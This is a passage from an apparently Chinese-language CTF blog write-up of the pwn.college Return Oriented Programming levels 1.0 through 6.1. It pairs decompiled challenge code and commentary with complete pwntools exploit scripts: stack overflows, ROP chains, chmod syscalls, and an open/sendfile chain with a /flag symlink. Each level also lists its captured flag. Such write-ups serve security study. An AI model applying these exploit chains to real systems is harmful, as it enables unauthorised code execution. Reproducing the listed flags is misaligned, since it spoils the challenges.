Write-ups: Program Security (Return Oriented Programming) series (Completed)
Table of contents
Open Table of contents
- 前言
- Level 1.0
- Level 1.1
- Level 2.0
- Level 2.1
- Level 3.0
- Level 3.1
- Level 4.0
- Level 4.1
- Level 5.0
- Level 5.1
- Level 6.0
- Level 6.1
- Level 7.0
- Level 7.1
- Level 8.0
- Level 8.1
- Level 9.0
- Level 9.1
- Level 10.0
- Level 10.1
- Level 11.0
- Level 11.1
- Level 12.0
- Level 12.1
- Level 13.0
- Level 13.1
- Level 14.0
- Level 14.1
- Level 15.0
- Level 15.1
- 后记
我觉得应该珍惜现在的 ROP,Intel 近几年刚提出的 CET (Control-flow Enforcement Technology)
足以杀死绝大多数 ROP Exploit 了……以后 ROP 应该会更难一点,虽然不排除可能会出现新奇的绕过方式就是了 LOL
唉,算是经历了一个时代的变迁了吧?简单了解了一下 CET,靠,我要是早几年生我也可以想出来!!!就很感慨厉害的技术往往都是一些很简单的概念,却达到了非凡的效果,我也幻想自己可以研究点东西出来。
Level 1.0
- Category: Pwn
Overwrite a return address to trigger a win function!
1 collapsed line
int __fastcall challenge(int a1, __int64 a2, __int64 a3){ _QWORD v4[3]; // [rsp+0h] [rbp-60h] BYREF int v5; // [rsp+1Ch] [rbp-44h] _BYTE buf[60]; // [rsp+20h] [rbp-40h] BYREF int v7; // [rsp+5Ch] [rbp-4h] __int64 savedregs; // [rsp+60h] [rbp+0h] BYREF _UNKNOWN *retaddr; // [rsp+68h] [rbp+8h] BYREF22 collapsed lines
v5 = a1; v4[2] = a2; v4[1] = a3; puts( "This challenge reads in some bytes, overflows its stack, and allows you to perform a ROP attack. Through this series of"); puts("challenges, you will become painfully familiar with the concept of Return Oriented Programming!\n"); sp_ = (__int64)v4; bp_ = (__int64)&savedregs; sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v4) >> 3) + 2; rp_ = (__int64)&retaddr; puts("In this challenge, there is a win() function."); printf("win() will open the flag and send its data to stdout; it is at %p.\n", win); puts("In order to get the flag, you will need to call this function.\n"); puts("You can call a function by directly overflowing into the saved return address,"); printf( "which is stored at %p, %d bytes after the start of your input buffer.\n", (const void *)rp_, rp_ - (_QWORD)buf); printf( "That means that you will need to input at least %d bytes (%d to fill the buffer,\n", rp_ - (_QWORD)buf + 8, 57); printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_QWORD)buf - 57); puts("and 8 that will overwrite the return address)."); v7 = read(0, buf, 0x1000uLL); printf("Received %d bytes! This is potentially %d gadgets.\n", v7, (unsigned __int64)&buf[v7 - rp_] >> 3); puts("Let's take a look at your chain! Note that we have no way to verify that the gadgets are executable"); puts("from within this challenge. You will have to do that by yourself.");3 collapsed lines
print_chain(rp_, (unsigned int)((unsigned __int64)&buf[v7 - rp_] >> 3) + 1); return puts("Leaving!");}
很明显的栈溢出吧,然后我们希望执行 win
__uid_t win(){ int *v0; // rax char *v1; // rax __uid_t result; // eax int *v3; // rax char *v4; // rax
puts("You win! Here is your flag:"); flag_fd_23114 = open("/flag", 0); if ( flag_fd_23114 >= 0 ) { flag_length_23115 = read(flag_fd_23114, &flag_23113, 0x100uLL); if ( flag_length_23115 > 0 ) { write(1, &flag_23113, flag_length_23115); return puts("\n"); } else { v3 = __errno_location(); v4 = strerror(*v3); return printf("\n ERROR: Failed to read the flag -- %s!\n", v4); } } else { v0 = __errno_location(); v1 = strerror(*v0); printf("\n ERROR: Failed to open the flag -- %s!\n", v1); result = geteuid(); if ( result ) { puts(" Your effective user id is not 0!"); return puts(" You must directly run the suid binary in order to have the correct permissions!"); } } return result;}
好吧,看来第一题比我想象中的要简单得多的多,可以说是没有任何限制条件,直接覆盖返回地址解决。就当是安慰我了 LMAO
from pwn import ELF, context, gdb, log, p64, process, remote
context(log_level="debug", terminal="kitty")
FILE = "./babyrop_level1.0"HOST, PORT = "localhost", 1337
gdbscript = """c"""
padding_to_ret = b"".ljust(0x48, b"A")win_address = p64(0x401926)
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
def send_payload(target, payload): try: target.send(payload) except Exception as e: log.exception(f"An error occurred while sending payload: {e}")
def construct_payload(): payload = padding_to_ret payload += win_address
return payload
def attack(target, payload): try: send_payload(target, payload) target.recvall(timeout=3) except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: target = launch(debug=False) payload = construct_payload()
attack(target, payload) except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{wpfRp_d39M4TTN2Q66mN_kfp0_g.0VM0MDL5cTNxgzW}
Level 1.1
- Category: Pwn
Overwrite a return address to trigger a win function!
参见 Level 1.0。
from pwn import ELF, context, gdb, log, p64, process, remote
context(log_level="debug", terminal="kitty")
FILE = "./babyrop_level1.1"HOST, PORT = "localhost", 1337
gdbscript = """c"""
padding_to_ret = b"".ljust(0x68, b"A")win_address = p64(0x401CAF)
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
def send_payload(target, payload): try: target.send(payload) except Exception as e: log.exception(f"An error occurred while sending payload: {e}")
def construct_payload(): payload = padding_to_ret payload += win_address
return payload
def attack(target, payload): try: send_payload(target, payload) target.recvall(timeout=3) except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: target = launch(debug=False) payload = construct_payload()
attack(target, payload) except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{kIrK17VA4RSajTUwItMyNbaBDJw.0lM0MDL5cTNxgzW}
Level 2.0
- Category: Pwn
Use ROP to trigger a two-stage win function!
30 collapsed lines
int __fastcall challenge(int a1, __int64 a2, __int64 a3){ _QWORD v4[3]; // [rsp+0h] [rbp-80h] BYREF int v5; // [rsp+1Ch] [rbp-64h] _BYTE buf[92]; // [rsp+20h] [rbp-60h] BYREF int v7; // [rsp+7Ch] [rbp-4h] __int64 savedregs; // [rsp+80h] [rbp+0h] BYREF _UNKNOWN *retaddr; // [rsp+88h] [rbp+8h] BYREF
v5 = a1; v4[2] = a2; v4[1] = a3; puts( "This challenge reads in some bytes, overflows its stack, and allows you to perform a ROP attack. Through this series of"); puts("challenges, you will become painfully familiar with the concept of Return Oriented Programming!\n"); sp_ = (__int64)v4; bp_ = (__int64)&savedregs; sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v4) >> 3) + 2; rp_ = (__int64)&retaddr; puts( "In this challenge, there are 2 stages of win functions. The functions are labeled `win_stage_1` through `win_stage_2`."); puts("In order to get the flag, you will need to call all of these stages in order.\n"); puts("You can call a function by directly overflowing into the saved return address,"); printf( "which is stored at %p, %d bytes after the start of your input buffer.\n", (const void *)rp_, rp_ - (_QWORD)buf); printf( "That means that you will need to input at least %d bytes (%d to fill the buffer,\n", rp_ - (_QWORD)buf + 8, 79); printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_QWORD)buf - 79); puts("and 8 that will overwrite the return address)."); v7 = read(0, buf, 0x1000uLL); printf("Received %d bytes! This is potentially %d gadgets.\n", v7, (unsigned __int64)&buf[v7 - rp_] >> 3); puts("Let's take a look at your chain! Note that we have no way to verify that the gadgets are executable"); puts("from within this challenge. You will have to do that by yourself.");3 collapsed lines
print_chain(rp_, (unsigned int)((unsigned __int64)&buf[v7 - rp_] >> 3) + 1); return puts("Leaving!");}
逆向发现有两个 win
int win_stage_1(){ _BYTE buf[260]; // [rsp+10h] [rbp-110h] BYREF int v2; // [rsp+114h] [rbp-Ch] int v3; // [rsp+118h] [rbp-8h] int fd; // [rsp+11Ch] [rbp-4h]
fd = open("/flag", 0); v3 = lseek(fd, 0LL, 2) / 2 + 1; lseek(fd, 0LL, 0); v2 = read(fd, buf, v3); write(1, buf, v2); return close(fd);}
int win_stage_2(){ _BYTE buf[260]; // [rsp+10h] [rbp-110h] BYREF int v2; // [rsp+114h] [rbp-Ch] int v3; // [rsp+118h] [rbp-8h] int fd; // [rsp+11Ch] [rbp-4h]
fd = open("/flag", 0); v3 = lseek(fd, 0LL, 2) / 2 + 1; lseek(fd, v3, 0); v2 = read(fd, buf, v3); write(1, buf, v2); return close(fd);}
// attributes: thunk__off_t lseek(int fd, __off_t offset, int whence){ return lseek(fd, offset, whence);}
是 whence
决定了偏移的基准位置。执行成功返回新的文件偏移量,以字节为单位;失败则返回 -1
,并设置 errno
有三个可选参数:SEEK_SET (0)
和 SEEK_END (2)
就以 win_stage_1
为例简单讲一下 lseek
在这里的作用:首先 open
返回了打开的文件描述符,v3 = lseek(fd, 0LL, 2) / 2 + 1;
做的是将 fd
的文件指针定位到文件末,返回了整个文件的大小,除以 2 相当于取这个文件的一半数据,然后加一,返回值保存到 v3
。之后 lseek(fd, 0LL, 0);
又将文件指针指回文件头,v2 = read(fd, buf, v3);
做的是从 fd
读取 v3
字节数据到 buf
,之后 write(1, buf, v2);
将 buf
中 v2
字节数据写入 stdout
,所以整个函数就是做了一个读取文件一半加一字节内容并输出的工作。注意 win_stage_1
是读取前一半并输出,而 win_stage_2
所以我们要做的很简单,就是构造 ROP Chain 依次执行这两个函数呗。
from pwn import ELF, context, gdb, log, p64, process, remote
context(log_level="debug", terminal="kitty")
FILE = "./babyrop_level2.0"HOST, PORT = "localhost", 1337
gdbscript = """c"""
padding_to_ret = b"".ljust(0x68, b"A")win_stage_1 = p64(0x401D66)win_stage_2 = p64(0x401E13)
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
def send_payload(target, payload): try: target.send(payload) except Exception as e: log.exception(f"An error occurred while sending payload: {e}")
def construct_payload(): payload = padding_to_ret payload += win_stage_1 payload += win_stage_2
return payload
def attack(target, payload): try: send_payload(target, payload) target.recvall(timeout=3) except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: target = launch(debug=False) payload = construct_payload()
attack(target, payload) except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{4v7M0arrSE56nVZynPmA1hGzVcg.01M0MDL5cTNxgzW}
Level 2.1
- Category: Pwn
Use ROP to trigger a two-stage win function!
参见 Level 2.0。
from pwn import ELF, context, gdb, log, p64, process, remote
context(log_level="debug", terminal="kitty")
FILE = "./babyrop_level2.1"HOST, PORT = "localhost", 1337
gdbscript = """c"""
padding_to_ret = b"".ljust(0x28, b"A")win_stage_1 = p64(0x401F0F)win_stage_2 = p64(0x401FBC)
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
def send_payload(target, payload): try: target.send(payload) except Exception as e: log.exception(f"An error occurred while sending payload: {e}")
def construct_payload(): payload = padding_to_ret payload += win_stage_1 payload += win_stage_2
return payload
def attack(target, payload): try: send_payload(target, payload) target.recvall(timeout=3) except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: target = launch(debug=False) payload = construct_payload()
attack(target, payload) except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{8i7RS4fxOytxYOpVidcCJE-hXqd.0FN0MDL5cTNxgzW}
Level 3.0
- Category: Pwn
Use ROP to trigger a multi-stage win function!
4 collapsed lines
int __fastcall win_stage_1(int a1){ _BYTE buf[260]; // [rsp+10h] [rbp-110h] BYREF int v3; // [rsp+114h] [rbp-Ch] int v4; // [rsp+118h] [rbp-8h] int fd; // [rsp+11Ch] [rbp-4h]
if ( a1 != 1 ) return puts("Error: Incorrect value!"); fd = open("/flag", 0); v4 = (int)lseek(fd, 0LL, 2) / 5 + 1; lseek(fd, 0LL, 0);4 collapsed lines
v3 = read(fd, buf, v4); write(1, buf, v3); return close(fd);}
4 collapsed lines
int __fastcall win_stage_2(int a1){ _BYTE buf[260]; // [rsp+10h] [rbp-110h] BYREF int v3; // [rsp+114h] [rbp-Ch] int v4; // [rsp+118h] [rbp-8h] int fd; // [rsp+11Ch] [rbp-4h]
if ( a1 != 2 ) return puts("Error: Incorrect value!"); fd = open("/flag", 0); v4 = (int)lseek(fd, 0LL, 2) / 5 + 1; lseek(fd, v4, 0);4 collapsed lines
v3 = read(fd, buf, v4); write(1, buf, v3); return close(fd);}
4 collapsed lines
int __fastcall win_stage_3(int a1){ _BYTE buf[260]; // [rsp+10h] [rbp-110h] BYREF int v3; // [rsp+114h] [rbp-Ch] int v4; // [rsp+118h] [rbp-8h] int fd; // [rsp+11Ch] [rbp-4h]
if ( a1 != 3 ) return puts("Error: Incorrect value!"); fd = open("/flag", 0); v4 = (int)lseek(fd, 0LL, 2) / 5 + 1; lseek(fd, 2 * v4, 0);4 collapsed lines
v3 = read(fd, buf, v4); write(1, buf, v3); return close(fd);}
4 collapsed lines
int __fastcall win_stage_4(int a1){ _BYTE buf[260]; // [rsp+10h] [rbp-110h] BYREF int v3; // [rsp+114h] [rbp-Ch] int v4; // [rsp+118h] [rbp-8h] int fd; // [rsp+11Ch] [rbp-4h]
if ( a1 != 4 ) return puts("Error: Incorrect value!"); fd = open("/flag", 0); v4 = (int)lseek(fd, 0LL, 2) / 5 + 1; lseek(fd, 3 * v4, 0);4 collapsed lines
v3 = read(fd, buf, v4); write(1, buf, v3); return close(fd);}
4 collapsed lines
int __fastcall win_stage_5(int a1){ _BYTE buf[260]; // [rsp+10h] [rbp-110h] BYREF int v3; // [rsp+114h] [rbp-Ch] int v4; // [rsp+118h] [rbp-8h] int fd; // [rsp+11Ch] [rbp-4h]
if ( a1 != 5 ) return puts("Error: Incorrect value!"); fd = open("/flag", 0); v4 = (int)lseek(fd, 0LL, 2) / 5 + 1; lseek(fd, 4 * v4, 0);4 collapsed lines
v3 = read(fd, buf, v4); write(1, buf, v3); return close(fd);}
这次分成了五个阶段输出,只要分别绕过这五个阶段的 if
即可。因为是 amd64 架构的,所以第一个参数通过 rdi
传递,我们直接找有关这个寄存器的 gadgets,发现:0x402b53: pop rdi ; ret
,很好,这样的话我们先返回到这个 gadget,然后在它后面放绕过判断的参数,这个参数就会被 pop
到 rdi
感觉这题也可以用 D(ata)OP
,但是我一定不会告诉你我曾闲的蛋疼放着捷径不走试图绕远路,最后发现这条路是真 tm 远所以掉头回来走捷径的……
from pwn import ELF, ROP, context, gdb, log, p64, process, remote
context(log_level="debug", terminal="kitty")
FILE = "./babyrop_level3.0"HOST, PORT = "localhost", 1337
gdbscript = """b *challenge+337b *challenge+488c"""
padding_to_ret = b"".ljust(0x68, b"A")
win_stage_1 = p64(0x4023D9)bypass_win_stage_1 = p64(0x1)win_stage_2 = p64(0x402760)bypass_win_stage_2 = p64(0x2)win_stage_3 = p64(0x402598)bypass_win_stage_3 = p64(0x3)win_stage_4 = p64(0x40267A)bypass_win_stage_4 = p64(0x4)win_stage_5 = p64(0x4024B5)bypass_win_stage_5 = p64(0x5)
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: global elf
elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
def send_payload(target, payload): try: target.send(payload) except Exception as e: log.exception(f"An error occurred while sending payload: {e}")
def construct_payload(): rop = ROP(elf)
pop_rdi_ret = rop.find_gadget(["pop rdi", "ret"]).address
payload = padding_to_ret
for i in range(1, 6): payload += p64(pop_rdi_ret) payload += globals()[f"bypass_win_stage_{i}"] payload += globals()[f"win_stage_{i}"]
return payload
def attack(target, payload): try: send_payload(target, payload)
response = target.recvall(timeout=3)
if b"pwn.college{" in response: return True except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: target = launch(debug=False) payload = construct_payload()
if attack(target, payload): exit() except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{EE8eEBP70ZX0reoW2Pp8YObscck.0VN0MDL5cTNxgzW}
Level 3.1
- Category: Pwn
Use ROP to trigger a multi-stage win function!
参见 Level 3.0。
from pwn import ELF, ROP, context, gdb, log, p64, process, remote
context(log_level="debug", terminal="kitty")
FILE = "./babyrop_level3.1"HOST, PORT = "localhost", 1337
gdbscript = """c"""
padding_to_ret = b"".ljust(0x58, b"A")
win_stage_1 = p64(0x4015E3)bypass_win_stage_1 = p64(0x1)win_stage_2 = p64(0x40133A)bypass_win_stage_2 = p64(0x2)win_stage_3 = p64(0x4016BF)bypass_win_stage_3 = p64(0x3)win_stage_4 = p64(0x40141A)bypass_win_stage_4 = p64(0x4)win_stage_5 = p64(0x401500)bypass_win_stage_5 = p64(0x5)
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: global elf
elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
def send_payload(target, payload): try: target.send(payload) except Exception as e: log.exception(f"An error occurred while sending payload: {e}")
def construct_payload(): rop = ROP(elf)
pop_rdi_ret = rop.find_gadget(["pop rdi", "ret"]).address
payload = padding_to_ret
for i in range(1, 6): payload += p64(pop_rdi_ret) payload += globals()[f"bypass_win_stage_{i}"] payload += globals()[f"win_stage_{i}"]
return payload
def attack(target, payload): try: send_payload(target, payload)
response = target.recvall(timeout=3)
if b"pwn.college{" in response: return True except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: target = launch(debug=False) payload = construct_payload()
if attack(target, payload): exit() except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{o7dF6gbwKmwO-Xrdr1WGG5iKIQ-.0lN0MDL5cTNxgzW}
Level 4.0
- Category: Pwn
Leverage a stack leak while crafting a ROP chain to obtain the flag!
这题就是自由 ROP 自由日了,感觉还是用 chmod
最简单,问题在于如何传递第一个参数 const char *filename
嗯……自己构造 /flag
或者别的字符串未免也太麻烦了点,我们直接让 IDA 老婆看看程序本身有没有什么现成的好东西是我们可以直接利用的:

像这个 ret
说实话我感觉自己可能跑偏了,据说这题可以自己构造字符串,但是我太笨了没想出来怎么 leak stack……但是,你就说我这个方法是不是更简单吧 LMAO
刚打完 Level 7 的我敏锐的注意到了什么……既然 Level 7 是直接输出地址,那么……靠,Level 4 果然是把栈地址直接告诉我们了,但因为我没关注程序输出,so……好吧我本以为有什么神奇的构造字符串方法,那没事了,又结了一桩心头大患……
我日,为什么今天都 1.20 了,寒假过的真快,结束前能不能打完 FmtStr 都不好说了……
from pwn import ( ELF, ROP, constants, context, flat, gdb, log, os, process, remote,)
context(log_level="debug", terminal="kitty")
FILE = "./babyrop_level4.0"HOST, PORT = "localhost", 1337
gdbscript = """b *challenge+396c"""
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: global elf
elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
def send_payload(target, payload): try: target.send(payload) except Exception as e: log.exception(f"An error occurred while sending payload: {e}")
def construct_payload(): rop = ROP(elf)
padding_to_ret = b"".ljust(0x48, b"A")
filename = next(elf.search(b"ret")) mode = 0o4
pop_rdi_ret = rop.rdi.address pop_rsi_ret = rop.rsi.address pop_rax_ret = rop.rax.address syscall = rop.syscall.address
payload = padding_to_ret payload += flat( pop_rdi_ret, filename, pop_rsi_ret, mode, pop_rax_ret, constants.SYS_chmod, syscall, )
return payload
def attack(target, payload): try: os.system("ln -s /flag ret")
send_payload(target, payload)
try: with open("/flag", "r") as file: content = file.read() log.success(content)
return True except FileNotFoundError: log.exception("The file '/flag' does not exist.") except PermissionError: log.failure("Permission denied to read '/flag'.") except Exception as e: log.exception(f"An error occurred while performing attack: {e}") except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: target = launch(debug=False) payload = construct_payload()
if attack(target, payload): exit() except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{EXzWCvmQZIa9w6wrK_nx0PK1w3_.01N0MDL5cTNxgzW}
Level 4.1
- Category: Pwn
Leverage a stack leak while crafting a ROP chain to obtain the flag!
参见 Level 4.0。
from pwn import ( ELF, ROP, constants, context, flat, gdb, log, os, process, remote,)
context(log_level="debug", terminal="kitty")
FILE = "./babyrop_level4.1"HOST, PORT = "localhost", 1337
gdbscript = """c"""
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: global elf
elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
def send_payload(target, payload): try: target.send(payload) except Exception as e: log.exception(f"An error occurred while sending payload: {e}")
def construct_payload(): rop = ROP(elf)
padding_to_ret = b"".ljust(0x78, b"A")
filename = next(elf.search(b"###")) mode = 0o4
pop_rdi_ret = rop.rdi.address pop_rsi_ret = rop.rsi.address pop_rax_ret = rop.rax.address syscall = rop.syscall.address
payload = padding_to_ret payload += flat( pop_rdi_ret, filename, pop_rsi_ret, mode, pop_rax_ret, constants.SYS_chmod, syscall, )
return payload
def attack(target, payload): try: os.system("ln -s /flag '###'")
send_payload(target, payload)
try: with open("/flag", "r") as file: content = file.read() log.success(content)
return True except FileNotFoundError: log.exception("The file '/flag' does not exist.") except PermissionError: log.failure("Permission denied to read '/flag'.") except Exception as e: log.exception(f"An error occurred while performing attack: {e}") except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: target = launch(debug=False) payload = construct_payload()
if attack(target, payload): exit() except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{g2fR-zCK75_60foo4wveIENcvF0.0FO0MDL5cTNxgzW}
Level 5.0
- Category: Pwn
Craft a ROP chain to obtain the flag, now with no stack leak!
这题才应该用我在 Level 4 用的方法吧,有时间我得好好研究下 Level 4 到底怎么泄漏地址了……
from pwn import ( ELF, ROP, constants, context, flat, gdb, log, os, process, remote,)
context(log_level="debug", terminal="kitty")
FILE = "./babyrop_level5.0"HOST, PORT = "localhost", 1337
gdbscript = """c"""
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: global elf
elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
def send_payload(target, payload): try: target.send(payload) except Exception as e: log.exception(f"An error occurred while sending payload: {e}")
def construct_payload(): rop = ROP(elf)
padding_to_ret = b"".ljust(0x48, b"A")
filename = next(elf.search(b"GNU")) mode = 0o4
pop_rdi_ret = rop.rdi.address pop_rsi_ret = rop.rsi.address pop_rax_ret = rop.rax.address syscall = rop.syscall.address
payload = padding_to_ret payload += flat( pop_rdi_ret, filename, pop_rsi_ret, mode, pop_rax_ret, constants.SYS_chmod, syscall, )
return payload
def attack(target, payload): try: os.system("ln -s /flag GNU")
send_payload(target, payload)
try: with open("/flag", "r") as file: content = file.read() log.success(content)
return True except FileNotFoundError: log.exception("The file '/flag' does not exist.") except PermissionError: log.failure("Permission denied to read '/flag'.") except Exception as e: log.exception(f"An error occurred while performing attack: {e}") except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: target = launch(debug=False) payload = construct_payload()
if attack(target, payload): exit() except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{sAqwz2eKPKj_t1zS9diA-_sbUf0.0VO0MDL5cTNxgzW}
Level 5.1
- Category: Pwn
Craft a ROP chain to obtain the flag, now with no stack leak!
参见 Level 5.0。
from pwn import ( ELF, ROP, constants, context, flat, gdb, log, os, process, remote,)
context(log_level="debug", terminal="kitty")
FILE = "./babyrop_level5.1"HOST, PORT = "localhost", 1337
gdbscript = """c"""
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: global elf
elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
def send_payload(target, payload): try: target.send(payload) except Exception as e: log.exception(f"An error occurred while sending payload: {e}")
def construct_payload(): rop = ROP(elf)
padding_to_ret = b"".ljust(0x68, b"A")
filename = next(elf.search(b"GNU")) mode = 0o4
pop_rdi_ret = rop.rdi.address pop_rsi_ret = rop.rsi.address pop_rax_ret = rop.rax.address syscall = rop.syscall.address
payload = padding_to_ret payload += flat( pop_rdi_ret, filename, pop_rsi_ret, mode, pop_rax_ret, constants.SYS_chmod, syscall, )
return payload
def attack(target, payload): try: os.system("ln -s /flag GNU")
send_payload(target, payload)
try: with open("/flag", "r") as file: content = file.read() log.success(content)
return True except FileNotFoundError: log.exception("The file '/flag' does not exist.") except PermissionError: log.failure("Permission denied to read '/flag'.") except Exception as e: log.exception(f"An error occurred while performing attack: {e}") except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: target = launch(debug=False) payload = construct_payload()
if attack(target, payload): exit() except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{Uer5U7c794jENBtWtFCgDEyLRsm.0FM1MDL5cTNxgzW}
Level 6.0
- Category: Pwn
Craft a ROP chain to obtain the flag, now with no syscall gadget!
没有 syscall
gadget 了,但是瞧瞧我发现了什么?
ssize_t __fastcall force_import(const char *a1, int a2){ off_t *v2; // rdx size_t v3; // rcx
open(a1, a2); return sendfile((int)a1, a2, v2, v3);}
一次传参直接调用 force_import
肯定是不太方便的,但是既然内部有 open
和 sendfile
,那为何不分别调用它们呢?easy peasy!
from pwn import ( ELF, ROP, constants, context, flat, gdb, log, os, process, remote,)
context(log_level="debug", terminal="kitty")
FILE = "./babyrop_level6.0"HOST, PORT = "localhost", 1337
gdbscript = """b *challenge+288c"""
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: global elf
elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
def send_payload(target, payload): try: target.send(payload) except Exception as e: log.exception(f"An error occurred while sending payload: {e}")
def construct_payload(): rop = ROP(elf)
padding_to_ret = b"".ljust(0x58, b"A")
# args for open filename = next(elf.search(b"GNU")) flags = constants.O_RDONLY
# args for sendfile out_fd = 0x1 in_fd = 0x3 offset = 0x0 count = 0x1000
pop_rdi_ret = rop.rdi.address pop_rsi_ret = rop.rsi.address pop_rdx_ret = rop.rdx.address pop_rcx_ret = rop.rcx.address
payload = padding_to_ret payload += flat( pop_rdi_ret, filename, pop_rsi_ret, flags, elf.symbols["open"], pop_rdi_ret, out_fd, pop_rsi_ret, in_fd, pop_rdx_ret, offset, pop_rcx_ret, count, elf.symbols["sendfile"], )
return payload
def attack(target, payload): try: os.system("ln -s /flag GNU")
send_payload(target, payload)
response = target.recvall(timeout=3)
if b"pwn.college{" in response: return True except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: target = launch(debug=False) payload = construct_payload()
if attack(target, payload): exit() except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{0u8eS8EM1OTTXbPHdwgRj2FQ4m0.0VM1MDL5cTNxgzW}
Level 6.1
- Category: Pwn
Craft a ROP chain to obtain the flag, now with no syscall gadget!
参见 Level 6.0。
from pwn import ( ELF, ROP, constants, context, flat, gdb, log, os, process, remote,)
context(log_level="debug", terminal="kitty")
FILE = "./babyrop_level6.1"HOST, PORT = "localhost", 1337
gdbscript = """c"""
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: global elf
elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
def send_payload(target, payload): try: target.send(payload) except Exception as e: log.exception(f"An error occurred while sending payload: {e}")
def construct_payload(): rop = ROP(elf)
padding_to_ret = b"".ljust(0x28, b"A")
# args for open filename = next(elf.search(b"GNU")) flags = constants.O_RDONLY
# args for sendfile out_fd = 0x1 in_fd = 0x3 offset = 0x0 count = 0x1000
pop_rdi_ret = rop.rdi.address pop_rsi_ret = rop.rsi.address pop_rdx_ret = rop.rdx.address pop_rcx_ret = rop.rcx.address
payload = padding_to_ret payload += flat( pop_rdi_ret, filename, pop_rsi_ret, flags, elf.symbols["open"], pop_rdi_ret, out_fd, pop_rsi_ret, in_fd, pop_rdx_ret, offset, pop_rcx_ret, count, elf.symbols["sendfile"], )
return payload
def attack(target, payload): try: os.system("ln -s /flag GNU")
send_payload(target, payload)
response = target.recvall(timeout=3)
if b"pwn.college{" in response: return True except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: target = launch(debug=False) payload = construct_payload()
if attack(target, payload): exit() except Exception as e: log.exception(f"An error occurred in main: {e}")
